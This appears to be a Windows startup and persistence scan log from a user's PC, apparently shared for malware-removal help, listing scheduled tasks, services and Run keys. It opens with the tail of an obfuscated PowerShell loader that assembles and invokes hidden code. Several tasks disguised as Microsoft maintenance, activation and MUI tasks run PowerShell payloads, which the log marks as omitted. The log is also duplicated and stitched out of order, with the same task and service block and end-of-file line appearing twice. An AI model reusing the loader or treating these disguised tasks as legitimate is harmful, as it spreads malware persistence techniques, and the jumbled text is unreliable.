-rep'+''+'lace($Czjm[12]+$Czjm[14]+$Czjm[12]+$Czjm[12]+$Czjm[6]),(''$''+396/396)'|&($Czjm[18]+$Czjm[1]+$Czjm[9])|&($Czjm[18]+$Czjm[1]+$Czjm[9]);7913805660"
O22 - Task: Adobe Acrobat Update Task - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
O22 - Task: AdobeGCInvoker-1.0 - C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe -mode=scheduled
O22 - Task: Avast Emergency Update - C:\Program Files\Avast Software\Avast\AvEmUpdate.exe (file missing)
O22 - Task: GoogleUpdateTaskMachineCore - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /c
O22 - Task: GoogleUpdateTaskMachineUA - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /ua /installsource scheduler
O22 - Task: IntelSURQC-Upgrade-86621605-2a0b-4128-8ffc-15514c247132 - C:\Program Files\Intel\SUR\QUEENCREEK\Updater\bin\IntelSoftwareAssetManagerService.exe --automatic
O22 - Task: IntelSURQC-Upgrade-86621605-2a0b-4128-8ffc-15514c247132-Logon - C:\Program Files\Intel\SUR\QUEENCREEK\Updater\bin\IntelSoftwareAssetManagerService.exe --automatic
O22 - Task: IUM-F1E24CA0-B63E-4F13-A9E3-4ADE3BFF3473 - C:\Program Files (x86)\Intel\Intel(R) Update Manager\bin\iumsvc.exe --automatic (file missing)
O22 - Task: McAfee Remediation (Prepare) - C:\Program Files\Common Files\AV\McAfee VirusScan\upgrade.exe /prepare
O22 - Task: McAfeeLogon - C:\Program Files\Common Files\McAfee\Platform\McUICnt.exe /platui
O22 - Task: OneDrive Reporting Task-S-1-5-21-523137893-4004670275-4196358549-1001 - C:\Users\CASPER\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe /reporting
O22 - Task: Opera GX scheduled assistant Autoupdate 1614967658 - C:\Users\CASPER\AppData\Local\Programs\Opera GX\launcher.exe --scheduledautoupdate --component-name=assistant --component-path="C:\Users\CASPER\AppData\Local\Programs\Opera GX\assistant" $(Arg0)
O22 - Task: Opera GX scheduled Autoupdate 1604429592 - C:\Users\CASPER\AppData\Local\Programs\Opera GX\launcher.exe --scheduledautoupdate $(Arg0)
O22 - Task: Opera scheduled assistant Autoupdate 1590958890 - C:\Users\CASPER\AppData\Local\Programs\Opera\launcher.exe --scheduledautoupdate --component-name=assistant --component-path="C:\Users\CASPER\AppData\Local\Programs\Opera\assistant" $(Arg0) (file missing)
O22 - Task: Opera scheduled Autoupdate 1590958881 - C:\Users\CASPER\AppData\Local\Programs\Opera\launcher.exe --scheduledautoupdate $(Arg0) (file missing)
O22 - Task: TaskbarX CASPERNIRVANACASPER - C:\Users\CASPER\Desktop\TaskbarX_1.6.9.0_x64\TaskbarX.exe -tbs=1 -color=0;0;0;50 -tpop=100 -tsop=100 -as=cubiceaseinout -obas=cubiceaseinout -asp=300 -ptbo=0 -stbo=0 -lr=400 -oblr=400 -sr=0 -sr2=0 -sr3=0 -ftotc=1 -rzbt=1 (file missing)
O23 - Service R2: Adobe Acrobat Update Service - (AdobeARMservice) - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
O23 - Service R2: Adobe Genuine Monitor Service - (AGMService) - C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe
O23 - Service R2: Adobe Genuine Software Integrity Service - (AGSService) - C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe
O23 - Service R2: Dolby DAX2 API Service - (DAX2API) - C:\Program Files\Dolby\Dolby DAX2\DAX2_API\DolbyDAX2API.exe
O23 - Service R2: Elan Service - (ETDService) - C:\Program Files\Elantech\ETDService.exe
O23 - Service R2: Gaming Services - (GamingServices) - C:\Program Files\WindowsApps\Microsoft.GamingServices_3.60.12001.0_x64__8wekyb3d8bbwe\GamingServices.exe
O23 - Service R2: Gaming Services - (GamingServicesNet) - C:\Program Files\WindowsApps\Microsoft.GamingServices_3.60.12001.0_x64__8wekyb3d8bbwe\GamingServicesNet.exe
O23 - Service R2: Intel(R) Driver & Support Assistant - (DSAService) - C:\Program Files (x86)\Intel\Driver and Support Assistant\DSAService.exe
O23 - Service R2: Intel(R) HD Graphics Control Panel Service - (igfxCUIService2.0.0.0) - C:\WINDOWS\system32\igfxCUIService.exe
O23 - Service R2: McAfee AP Service - (McAPExe) - C:\Program Files\Common Files\McAfee\VSCore_21_4\McApExe.exe
O23 - Service R2: McAfee CSP Service - (mccspsvc) - C:\Program Files\Common Files\McAfee\CSP\4.3.107.0\\McCSPServiceHost.exe
O23 - Service R2: McAfee Module Core Service - (ModuleCoreService) - C:\Program Files\Common Files\McAfee\ModuleCore\ModuleCoreService.exe
O23 - Service R2: McAfee PEF Service - (PEFService) - C:\Program Files\Common Files\McAfee\PEF\CORE\PEFService.exe
O23 - Service R2: McAfee Service Controller - (mfemms) - C:\Program Files\Common Files\McAfee\SystemCore\mfemms.exe
O23 - Service R2: McAfee WebAdvisor - C:\Program Files\McAfee\WebAdvisor\ServiceHost.exe
O23 - Service R2: PMBDeviceInfoProvider - C:\Program Files (x86)\Sony\PlayMemories Home\PMBDeviceInfoProvider.exe
O23 - Service R3: Intel(R) Driver & Support Assistant Updater - (DSAUpdateService) - C:\Program Files (x86)\Intel\Driver and Support Assistant\DSAUpdateService.exe
O23 - Service R3: McAfee Validation Trust Protection Service - (mfevtp) - C:\Program Files\Common Files\McAfee\SystemCore\mfemms.exe
O23 - Service S2: Google Güncelleme Hizmeti (gupdate) - (gupdate) - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /svc
O23 - Service S3: BattlEye Service - (BEService) - C:\Program Files (x86)\Common Files\BattlEye\BEService.exe
O23 - Service S3: EasyAntiCheat - C:\Program Files (x86)\EasyAntiCheat\EasyAntiCheat.exe
O23 - Service S3: Epic Online Services - (EpicOnlineServices) - C:\Program Files (x86)\Epic Games\Epic Online Services\service\EpicOnlineServicesHost.exe
O23 - Service S3: Google Chrome Elevation Service (GoogleChromeElevationService) - (GoogleChromeElevationService) - C:\Program Files (x86)\Google\Chrome\Application\97.0.4692.71\elevation_service.exe
O23 - Service S3: Google Güncelleme Hizmeti (gupdatem) - (gupdatem) - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /medsvc
O23 - Service S3: Intel(R) Content Protection HECI Service - (cphs) - C:\WINDOWS\SysWow64\IntelCpHeciSvc.exe
O23 - Service S3: Intel(R) SUR QC Software Asset Manager - (Intel(R) SUR QC SAM) - C:\Program Files\Intel\SUR\QUEENCREEK\Updater\bin\IntelSoftwareAssetManagerService.exe
O23 - Service S3: McAfee Firewall Core Service - (mfefire) - C:\Program Files\Common Files\McAfee\SystemCore\mfemms.exe
O23 - Service S3: Rockstar Game Library Service - (Rockstar Service) - C:\Program Files\Rockstar Games\Launcher\RockstarService.exe
O23 - Service S3: Steam Client Service - C:\Program Files (x86)\Common Files\Steam\steamservice.exe /RunAsService
O23 - Service S3: SteelSeries Update Service - (SteelSeriesUpdateService) - C:\Program Files\SteelSeries\GG\SteelSeriesUpdateService.exe
O23 - Service S3: Uncheater for BattleGrounds_GL - (ucldr_battlegrounds_gl) - C:\Program Files\Common Files\UNCHEATER\ucldr_battlegrounds_gl.exe
O23 - Service S3: Uncheater for BattleGroundsLite_SE - (uncheater_bgl) - C:\Program Files\Common Files\Uncheater\uncheater_bgl.exe
O23 - Service S3: vgc - C:\Program Files\Riot Vanguard\vgc.exe
O23 - Service S3: Zakynthos Service - (zksvc) - C:\Program Files\Common Files\PUBG\zksvc.exe
--
End of file - Time spent: 104,3 sec. - 64562 bytes, CRC32: FFFFFFFF. Sign: 譭烮
O2-32 - HKLM\..\BHO: Java(tm) Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre1.8.0_271\bin\ssv.dll
O2-32 - HKLM\..\BHO: McAfee WebAdvisor - {B164E929-A1B6-4A06-B104-2CD0E90A88FF} - C:\Program Files\McAfee\WebAdvisor\win32\IEPlugin.dll
O4 - HKCU\..\Run: [Steam] = C:\Program Files (x86)\Steam\steam.exe -silent
O4 - HKCU\..\StartupApproved\Run: [com.blitz.app] = C:\Users\CASPER\AppData\Local\Programs\Blitz\Blitz.exe --autostart (2021/07/22)
O4 - HKCU\..\StartupApproved\Run: [DSL Host] = C:\Users\CASPER\AppData\Roaming\4C9F9BE4-4E44-4309-A6B4-69A5DA3242B1\DSL Host\dslhost.exe (2020/11/25)
O4 - HKCU\..\StartupApproved\Run: [OneDrive] = C:\Users\CASPER\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background (2021/07/22)
O4 - HKCU\..\StartupApproved\Run: [Opera GX Browser Assistant] = C:\Users\CASPER\AppData\Local\Programs\Opera GX\assistant\browser_assistant.exe (2021/03/09)
O4 - HKCU\..\StartupApproved\Run: [Spotify] = C:\Users\CASPER\AppData\Roaming\Spotify\Spotify.exe --autostart --minimized (2020/06/01)
O4 - HKCU\..\StartupApproved\Run: [Voicemod] = C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe (file missing) (2020/11/25)
O4 - HKCU\..\StartupApproved\Run: [Zoom] = (no file) (2021/03/12)
O4 - HKCU\..\StartupApproved\StartupFolder: C:\Users\CASPER\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NimoLive.lnk -> C:\Program Files (x86)\NimoLive\launcher.exe (2021/10/03)
O4 - HKLM\..\Run: [Cm108BSound] = C:\Program Files\Xear Audio Center\CPL\FaceLift_x64.exe /h /d
O4 - HKLM\..\Run: [Riot Vanguard] = C:\Program Files\Riot Vanguard\vgtray.exe
O4 - HKLM\..\Run: [SteelSeriesGG] = C:\Program Files\SteelSeries\GG\SteelSeriesGG.exe -dataPath="C:\ProgramData\SteelSeries\GG" -dbEnv=production -auto=true
O4 - HKLM\..\StartupApproved\Run: [AdobeGCInvoker-1.0] = C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe (2020/09/29)
O4 - HKLM\..\StartupApproved\Run: [AvastUI.exe] = C:\Program Files\Avast Software\Avast\AvLaunch.exe /gui (file missing) (2020/10/27)
O4 - HKLM\..\StartupApproved\Run: [ETDCtrl] = C:\Program Files\Elantech\ETDCtrl.exe (2021/09/25)
O4 - HKLM\..\StartupApproved\Run: [RtHDVBg_Dolby] = C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe /FORPCEE4 (2021/09/25)
O4 - HKLM\..\StartupApproved\Run: [RTHDVCPL] = C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe -s (2021/09/25)
O4 - HKLM\..\StartupApproved\Run: [tvncontrol] = C:\Program Files\TightVNC\tvnserver.exe -controlservice -slave (file missing) (2020/11/30)
O4 - HKLM\..\StartupApproved\Run: [Wondershare Helper Compact.exe] = C:\Program Files\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe (file missing) (2020/09/29)
O4 - HKLM\..\StartupApproved\Run32: [DivXMediaServer] = C:\Program Files (x86)\DivX\DivX Media Server\DivXMediaServer.exe (file missing) (2020/10/27)
O4 - HKLM\..\StartupApproved\Run32: [Intel Driver & Support Assistant] = C:\Program Files (x86)\Intel\Driver and Support Assistant\DSATray.exe (2021/12/22)
O4 - HKLM\..\StartupApproved\Run32: [PMBVolumeWatcher] = C:\Program Files (x86)\Sony\PlayMemories Home\PMBVolumeWatcher.exe /SysAutoRun (2021/03/09)
O4 - HKLM\..\StartupApproved\Run32: [SunJavaUpdateSched] = C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe (2021/03/12)
O4 - HKLM\..\StartupApproved\Run32: [Wondershare Helper Compact.exe] = C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe (file missing) (2020/11/09)
O4 - HKU\S-1-5-19\..\RunOnce: [WAB Migrate] = C:\Program Files\Windows Mail\wab.exe /Upgrade (User 'Local service')
O4 - HKU\S-1-5-20\..\RunOnce: [WAB Migrate] = C:\Program Files\Windows Mail\wab.exe /Upgrade (User 'Network service')
O9 - Button: HKLM\..\{48A61126-9A19-4C50-A214-FF08CB94995C}: McAfee WebAdvisor - C:\Program Files\McAfee\WebAdvisor\x64\IEPlugin.dll
O9 - Tools menu item: HKLM\..\{48A61126-9A19-4C50-A214-FF08CB94995C}: McAfee WebAdvisor - C:\Program Files\McAfee\WebAdvisor\x64\IEPlugin.dll
O9-32 - Button: HKLM\..\{48A61126-9A19-4C50-A214-FF08CB94995C}: McAfee WebAdvisor - C:\Program Files\McAfee\WebAdvisor\win32\IEPlugin.dll
O9-32 - Tools menu item: HKLM\..\{48A61126-9A19-4C50-A214-FF08CB94995C}: McAfee WebAdvisor - C:\Program Files\McAfee\WebAdvisor\win32\IEPlugin.dll
O17 - DHCP DNS 1: 192.168.1.1
O18 - HKLM\Software\Classes\Protocols\Filter\application/x-mfe-ipt: [CLSID] = {3EF5086B-5478-4598-A054-786C45D75692} - C:\Program Files\McAfee\MSC\McSnIePl64.dll
O21 - HKLM\..\ShellIconOverlayIdentifiers\00asw: (no name) - {472083B0-C522-11CF-8763-00608CC02F24} - (no file)
O22 - Task (.job): (disabled) (Not scheduled) CreateExplorerShellUnelevatedTask.job - C:\WINDOWS\explorer.exe
O22 - Task: (activation) \Microsoft\Windows\Windows Activation Technologies\Windows Activation Technologies - C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -c "[obfuscated PowerShell payload omitted]"
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\NCH Software (empty)
O22 - Task: (disabled) (update) \Microsoft\Windows\UpdateOrchestrator\Reboot_AC - C:\WINDOWS\system32\MusNotification.exe /RunOnAC EngagedRebootReminder (Microsoft)
O22 - Task: (disabled) (update) \Microsoft\Windows\UpdateOrchestrator\Reboot_Battery - C:\WINDOWS\system32\MusNotification.exe /RunOnBattery EngagedRebootReminder (Microsoft)
O22 - Task: (disabled) \Agent Activation Runtime\S-1-5-21-523137893-4004670275-4196358549-1001 - C:\WINDOWS\System32\AgentActivationRuntimeStarter.exe
O22 - Task: (disabled) \Microsoft\Windows\Management\Provisioning\Retry - C:\WINDOWS\system32\ProvTool.exe /turn 5 /source ProvRetryTask (Microsoft)
O22 - Task: (disabled) \Microsoft\Windows\Management\Provisioning\RunOnReboot - C:\WINDOWS\system32\ProvTool.exe /turn 5 /source ContinueSessionTask (Microsoft)
O22 - Task: (disabled) \Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work - C:\WINDOWS\system32\usoclient.exe StartMaintenanceWork (Microsoft)
O22 - Task: (disabled) \Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work - C:\WINDOWS\system32\usoclient.exe StartWork (Microsoft)
O22 - Task: (telemetry) \Microsoft\Office\Office 15 Subscription Heartbeat - C:\Program Files\Common Files\Microsoft Shared\Office16\OLicenseHeartbeat.exe (file missing)
O22 - Task: (telemetry) \Microsoft\Office\OfficeTelemetryAgentFallBack2016 - C:\Program Files\Microsoft Office\Office16\msoia.exe scan upload mininterval:2880 (Microsoft)
O22 - Task: (telemetry) \Microsoft\Office\OfficeTelemetryAgentLogOn2016 - C:\Program Files\Microsoft Office\Office16\msoia.exe scan upload (Microsoft)
O22 - Task: (telemetry) \Microsoft\Windows\Application Experience\PcaPatchDbTask - C:\WINDOWS\system32\rundll32.exe C:\WINDOWS\system32\PcaSvc.dll,PcaPatchSdbTask (Microsoft)
O22 - Task: \Avast Software\Overseer - C:\Program Files\Common Files\Avast Software\Overseer\overseer.exe /from_scheduler:1 (file missing)
O22 - Task: \McAfee\DAD.Execute.Updates - C:\Program Files\Common Files\McAfee\DynamicAppDownloader\1.6.110\DADUpdater.exe
O22 - Task: \McAfee\McAfee Auto Maintenance Task Agent - {ABCECA3B-EA5A-496B-A021-5C6BAB365E5C} - C:\Program Files\Common Files\McAfee\TaskScheduler\McAMTaskAgent.exe
O22 - Task: \McAfee\McAfee DAT Built in test - C:\Program Files\Common Files\McAfee\AMContent\scanners\x86_64\datrep\1.0.12.663\mcdatrep.exe /hcmode=periodic /periodicruncount=5
O22 - Task: \McAfee\McAfee Idle Detection Task - {ABCDCA3B-DE6B-5A7C-B132-6D7CBA63E5C5} - C:\Program Files\Common Files\McAfee\TaskScheduler\McAMTaskAgent.exe
O22 - Task: \Microsoft\Windows\Maintenance\WinNAT - C:\ProgramData\Windows\Profile\1.js powershell -c "[obfuscated PowerShell payload omitted]" (file missing)
O22 - Task: \Microsoft\Windows\MUI\578309983 - C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -c "[obfuscated PowerShell payload omitted]"
O22 - Task: \Microsoft\Windows\MUI\88542446 - C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -c "[obfuscated PowerShell payload omitted]"
O22 - Task: Adobe Acrobat Update Task - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
O22 - Task: AdobeGCInvoker-1.0 - C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe -mode=scheduled
O22 - Task: Avast Emergency Update - C:\Program Files\Avast Software\Avast\AvEmUpdate.exe (file missing)
O22 - Task: GoogleUpdateTaskMachineCore - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /c
O22 - Task: GoogleUpdateTaskMachineUA - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /ua /installsource scheduler
O22 - Task: IntelSURQC-Upgrade-86621605-2a0b-4128-8ffc-15514c247132 - C:\Program Files\Intel\SUR\QUEENCREEK\Updater\bin\IntelSoftwareAssetManagerService.exe --automatic
O22 - Task: IntelSURQC-Upgrade-86621605-2a0b-4128-8ffc-15514c247132-Logon - C:\Program Files\Intel\SUR\QUEENCREEK\Updater\bin\IntelSoftwareAssetManagerService.exe --automatic
O22 - Task: IUM-F1E24CA0-B63E-4F13-A9E3-4ADE3BFF3473 - C:\Program Files (x86)\Intel\Intel(R) Update Manager\bin\iumsvc.exe --automatic (file missing)
O22 - Task: McAfee Remediation (Prepare) - C:\Program Files\Common Files\AV\McAfee VirusScan\upgrade.exe /prepare
O22 - Task: McAfeeLogon - C:\Program Files\Common Files\McAfee\Platform\McUICnt.exe /platui
O22 - Task: OneDrive Reporting Task-S-1-5-21-523137893-4004670275-4196358549-1001 - C:\Users\CASPER\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe /reporting
O22 - Task: Opera GX scheduled assistant Autoupdate 1614967658 - C:\Users\CASPER\AppData\Local\Programs\Opera GX\launcher.exe --scheduledautoupdate --component-name=assistant --component-path="C:\Users\CASPER\AppData\Local\Programs\Opera GX\assistant" $(Arg0)
O22 - Task: Opera GX scheduled Autoupdate 1604429592 - C:\Users\CASPER\AppData\Local\Programs\Opera GX\launcher.exe --scheduledautoupdate $(Arg0)
O22 - Task: Opera scheduled assistant Autoupdate 1590958890 - C:\Users\CASPER\AppData\Local\Programs\Opera\launcher.exe --scheduledautoupdate --component-name=assistant --component-path="C:\Users\CASPER\AppData\Local\Programs\Opera\assistant" $(Arg0) (file missing)
O22 - Task: Opera scheduled Autoupdate 1590958881 - C:\Users\CASPER\AppData\Local\Programs\Opera\launcher.exe --scheduledautoupdate $(Arg0) (file missing)
O22 - Task: TaskbarX CASPERNIRVANACASPER - C:\Users\CASPER\Desktop\TaskbarX_1.6.9.0_x64\TaskbarX.exe -tbs=1 -color=0;0;0;50 -tpop=100 -tsop=100 -as=cubiceaseinout -obas=cubiceaseinout -asp=300 -ptbo=0 -stbo=0 -lr=400 -oblr=400 -sr=0 -sr2=0 -sr3=0 -ftotc=1 -rzbt=1 (file missing)
O23 - Service R2: Adobe Acrobat Update Service - (AdobeARMservice) - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
O23 - Service R2: Adobe Genuine Monitor Service - (AGMService) - C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe
O23 - Service R2: Adobe Genuine Software Integrity Service - (AGSService) - C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe
O23 - Service R2: Dolby DAX2 API Service - (DAX2API) - C:\Program Files\Dolby\Dolby DAX2\DAX2_API\DolbyDAX2API.exe
O23 - Service R2: Elan Service - (ETDService) - C:\Program Files\Elantech\ETDService.exe
O23 - Service R2: Gaming Services - (GamingServices) - C:\Program Files\WindowsApps\Microsoft.GamingServices_3.60.12001.0_x64__8wekyb3d8bbwe\GamingServices.exe
O23 - Service R2: Gaming Services - (GamingServicesNet) - C:\Program Files\WindowsApps\Microsoft.GamingServices_3.60.12001.0_x64__8wekyb3d8bbwe\GamingServicesNet.exe
O23 - Service R2: Intel(R) Driver & Support Assistant - (DSAService) - C:\Program Files (x86)\Intel\Driver and Support Assistant\DSAService.exe
O23 - Service R2: Intel(R) HD Graphics Control Panel Service - (igfxCUIService2.0.0.0) - C:\WINDOWS\system32\igfxCUIService.exe
O23 - Service R2: McAfee AP Service - (McAPExe) - C:\Program Files\Common Files\McAfee\VSCore_21_4\McApExe.exe
O23 - Service R2: McAfee CSP Service - (mccspsvc) - C:\Program Files\Common Files\McAfee\CSP\4.3.107.0\\McCSPServiceHost.exe
O23 - Service R2: McAfee Module Core Service - (ModuleCoreService) - C:\Program Files\Common Files\McAfee\ModuleCore\ModuleCoreService.exe
O23 - Service R2: McAfee PEF Service - (PEFService) - C:\Program Files\Common Files\McAfee\PEF\CORE\PEFService.exe
O23 - Service R2: McAfee Service Controller - (mfemms) - C:\Program Files\Common Files\McAfee\SystemCore\mfemms.exe
O23 - Service R2: McAfee WebAdvisor - C:\Program Files\McAfee\WebAdvisor\ServiceHost.exe
O23 - Service R2: PMBDeviceInfoProvider - C:\Program Files (x86)\Sony\PlayMemories Home\PMBDeviceInfoProvider.exe
O23 - Service R3: Intel(R) Driver & Support Assistant Updater - (DSAUpdateService) - C:\Program Files (x86)\Intel\Driver and Support Assistant\DSAUpdateService.exe
O23 - Service R3: McAfee Validation Trust Protection Service - (mfevtp) - C:\Program Files\Common Files\McAfee\SystemCore\mfemms.exe
O23 - Service S2: Google Güncelleme Hizmeti (gupdate) - (gupdate) - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /svc
O23 - Service S3: BattlEye Service - (BEService) - C:\Program Files (x86)\Common Files\BattlEye\BEService.exe
O23 - Service S3: EasyAntiCheat - C:\Program Files (x86)\EasyAntiCheat\EasyAntiCheat.exe
O23 - Service S3: Epic Online Services - (EpicOnlineServices) - C:\Program Files (x86)\Epic Games\Epic Online Services\service\EpicOnlineServicesHost.exe
O23 - Service S3: Google Chrome Elevation Service (GoogleChromeElevationService) - (GoogleChromeElevationService) - C:\Program Files (x86)\Google\Chrome\Application\97.0.4692.71\elevation_service.exe
O23 - Service S3: Google Güncelleme Hizmeti (gupdatem) - (gupdatem) - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /medsvc
O23 - Service S3: Intel(R) Content Protection HECI Service - (cphs) - C:\WINDOWS\SysWow64\IntelCpHeciSvc.exe
O23 - Service S3: Intel(R) SUR QC Software Asset Manager - (Intel(R) SUR QC SAM) - C:\Program Files\Intel\SUR\QUEENCREEK\Updater\bin\IntelSoftwareAssetManagerService.exe
O23 - Service S3: McAfee Firewall Core Service - (mfefire) - C:\Program Files\Common Files\McAfee\SystemCore\mfemms.exe
O23 - Service S3: Rockstar Game Library Service - (Rockstar Service) - C:\Program Files\Rockstar Games\Launcher\RockstarService.exe
O23 - Service S3: Steam Client Service - C:\Program Files (x86)\Common Files\Steam\steamservice.exe /RunAsService
O23 - Service S3: SteelSeries Update Service - (SteelSeriesUpdateService) - C:\Program Files\SteelSeries\GG\SteelSeriesUpdateService.exe
O23 - Service S3: Uncheater for BattleGrounds_GL - (ucldr_battlegrounds_gl) - C:\Program Files\Common Files\UNCHEATER\ucldr_battlegrounds_gl.exe
O23 - Service S3: Uncheater for BattleGroundsLite_SE - (uncheater_bgl) - C:\Program Files\Common Files\Uncheater\uncheater_bgl.exe
O23 - Service S3: vgc - C:\Program Files\Riot Vanguard\vgc.exe
O23 - Service S3: Zakynthos Service - (zksvc) - C:\Program Files\Common Files\PUBG\zksvc.exe
--
End of file - Time spent: 104,3 sec. - 64562 bytes, CRC32: FFFFFFFF. Sign: 譭烮